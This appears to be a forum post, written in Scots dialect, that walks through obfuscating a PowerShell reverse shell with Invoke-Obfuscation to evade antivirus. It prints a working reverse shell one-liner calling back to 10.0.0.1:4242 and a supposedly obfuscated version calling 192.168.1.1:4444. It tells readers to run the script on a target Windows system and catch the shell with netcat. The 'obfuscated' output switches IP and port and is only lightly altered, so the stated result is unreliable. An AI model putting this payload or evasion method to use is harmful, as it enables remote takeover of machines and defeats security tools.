Step 1: Create or develop yer malicious PowerShell script an' save it in a place ye can get at it. For example, this is one basic a reverse shell PowerShell script that we'll be obsfucatin:
Code: Select all
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPclient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Step 2: Efter ye've created an' saved yer malicious PowerShell script, we'll need tae specify the script path wi' Invoke-Obfuscate. Ye can dae this by runnin' the followin' command in the Invoke-Obfuscate prompt:
Code: Select all
SET SCRIPTPATH /PATH-TO-SCRIPT/script.ps1
Efter ye've specified the script path, ye'll be prompted wi' the obfuscation methods menu.
Step 3: Fur this example, we'll be usin' the AST obfuscation method:
Code: Select all
AST
Step 4: Aye, noo ye'll be prompted wi' the AST obfuscation options. In this case, we'll be goin' wi' the "ALL" option. This'll gie us the maximum amount o' obfuscation tae really mak' the script a right pain tae unravel:
Code: Select all
ALL
Step 5: Noo, ye'll be prompted tae confirm yer obfuscation method. Ye can dae this by runnin' the followin' command:
Code: Select all
1
Step 6: Invoke-Obfuscation will noo obfuscate the script an' output the obfuscated PowerShell code, jist like ye can see in the code below:
Code: Select all
Set-Variable -Name client -Value (New-Object System.Net.Sockets.TCPclient('192.168.1.1',4444));Set-Variable -Name stream -Value ($client.GetStream());[byte[]]$bytes = 0..65535|%{0};while((Set-Variable -Name i -Value ($stream.Read($bytes, 0, $bytes.Length))) -ne 0){;Set-Variable -Name data -Value ((New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i));Set-Variable -Name sendback -Value (iex $data 2>&1 | Out-String );Set-Variable sendback2 -Value ($sendback + 'PS ' + (pwd).Path + '> ');Set-Variable -Name sendbyte -Value (([text.encoding]::ASCII).GetBytes($sendback2));$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Step 7: Ye can copy the obfuscated PowerShell script an' save it in a new file. Efter that, ye can transfer it ower tae the target Windows system an' rin it.
Rinnin' the script dinnae raise ony AV detection or flags, an' we're able tae get a reverse shell connection on oor netcat listener.
We've managed tae obfuscate oor malicious PowerShell script an' evade any AV detection. Pure dead brilliant, that is! An' ye ken, ye can also use Invoke-Obfuscate tae obfuscate or encode individual PowerShell commands, if ye fancy giein' that a shot as well. Jist another wee trick up yer sleeve.